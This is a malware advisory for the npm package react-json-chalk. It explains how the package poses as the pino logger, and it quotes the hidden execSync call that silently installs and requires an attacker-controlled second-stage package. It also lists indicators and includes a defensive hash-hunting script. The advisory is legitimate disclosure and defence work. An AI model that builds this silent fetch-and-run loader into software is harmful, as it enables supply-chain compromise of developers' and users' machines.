Malicious package

react-json-chalk (npm)

Malicious code in react-json-chalk (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-4792
Immediate action
Remove the package, then rotate any secrets the build or runtime could reach. Because the second-stage dependency is fetched with --no-save, it is recorded in neither package.json nor the lockfile: delete node_modules/react-pinojs as well, or delete node_modules entirely and reinstall from a clean lockfile that no longer references react-json-chalk.
npm uninstall react-json-chalk

What this malware does

The package is published as react-json-chalk, but its main entry (pino.js) impersonates the pino logger: it carries pino's homepage (https://getpino.io), a bundled copy of the pino source tree, and pino's description. On require('react-json-chalk'), pino.js immediately loads lib/writer.js. At module top level, lib/writer.js tries require('react-pinojs'); if that fails, it executes child_process.execSync("npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent") and then require('../../react-pinojs/pino.js').

The flags silence the install and keep the new dependency out of package.json, so consumers get no visible signal that a second package was fetched. That dependency is unpinned and fully controlled by whoever publishes react-pinojs, and its code runs as part of this package's require(): arbitrary attacker code on every machine where the package is required (build, CI, or production), on every import, with a payload that can be changed upstream without republishing react-json-chalk.

The same lib/writer.js defines getMacAddress(), which enumerates the MAC addresses of non-internal IPv4 interfaces, consistent with host fingerprinting handed off to the second stage. The mismatch between name and contents (a logger source tree under an unrelated name) is itself a namespace-abuse / pino-impersonation pattern.

Malicious versions

2 flagged: 13.4.4, 13.4.6

Indicators of compromise (SHA-256)

c3411327be0927b7a726464d2bd9a590ff4ca61bc08e9170e4c0e482dc18dac2
1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77
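A hunt for the two digests above, as an added example (not tooling from the advisory or from O3 Security). It hashes every regular file under the directories it is given, typically the npm cache (~/.npm/_cacache) and each project's node_modules, so it does not matter whether an indicator refers to a package tarball or to an extracted file. It assumes sha256sum (coreutils) or shasum (BSD/macOS) is on the PATH; the self-check uses a constructed file, not real malware.

```shell
#!/bin/sh
# Added example (not from the advisory or O3 Security): hunt for the advisory's SHA-256
# indicators across directory trees. Assumes sha256sum (coreutils) or shasum (BSD/macOS).

# The two indicators published in this advisory, one per line.
ADVISORY_IOCS='c3411327be0927b7a726464d2bd9a590ff4ca61bc08e9170e4c0e482dc18dac2
1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77'

# Write the advisory's indicators to FILE for use with hunt_iocs.
write_advisory_iocs() { printf '%s\n' "$ADVISORY_IOCS" > "$1"; }

sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | cut -d' ' -f1
  else
    shasum -a 256 "$1" | cut -d' ' -f1
  fi
}

# hunt_iocs IOC_FILE DIR...  prints "<sha256> <path>" for each file whose digest appears
# in IOC_FILE (one hex digest per line). Exit status 0 if anything matched, 1 otherwise.
hunt_iocs() {
  ioc_file=$1
  shift
  matches=$(
    for dir in "$@"; do
      find "$dir" -type f 2>/dev/null | while IFS= read -r f; do
        h=$(sha256_of "$f")
        grep -qix "$h" "$ioc_file" && printf '%s %s\n' "$h" "$f"
      done
    done
  )
  [ -n "$matches" ] && printf '%s\n' "$matches"
}

# self_check: constructed fixture, not real malware. A file holding the bytes "abc" (whose
# SHA-256 is the well-known ba7816bf...15ad) stands in for a matching artifact, next to a
# clean file; the hunt must report the seeded file and nothing else.
self_check() {
  tmp=$(mktemp -d)
  mkdir "$tmp/tree"
  printf 'abc' > "$tmp/tree/seeded.tgz"
  printf 'nothing to see here' > "$tmp/tree/clean.js"
  { printf '%s\n' "$ADVISORY_IOCS"
    printf 'ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad\n'; } > "$tmp/iocs.txt"
  out=$(hunt_iocs "$tmp/iocs.txt" "$tmp/tree")
  rm -rf "$tmp"
  printf '%s\n' "$out" | grep -q 'seeded\.tgz$' && ! printf '%s\n' "$out" | grep -q 'clean\.js$'
}

# Typical use:
#   write_advisory_iocs iocs.txt
#   hunt_iocs iocs.txt "$HOME/.npm/_cacache" ./node_modules
```

A hit in the npm cache means the artifact was downloaded on that machine even if the package has since been uninstalled, which is the case to treat as a possible execution and to follow with credential rotation. Hashing is slow over large caches; run it once per host rather than per project.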

Frequently asked questions

react-json-chalk on npm is not safe to use: it has been identified as a malicious package (versions 13.4.4 and 13.4.6 flagged). Remove it immediately, and do not install it or keep it in your dependency tree.

Campaign

IN-MAL-2026-004875
IN-MAL-2026-005803

Credits

  • Amazon Inspector · finder

react-json-chalk (npm) malicious package — MAL-2026-4792 | O3 Security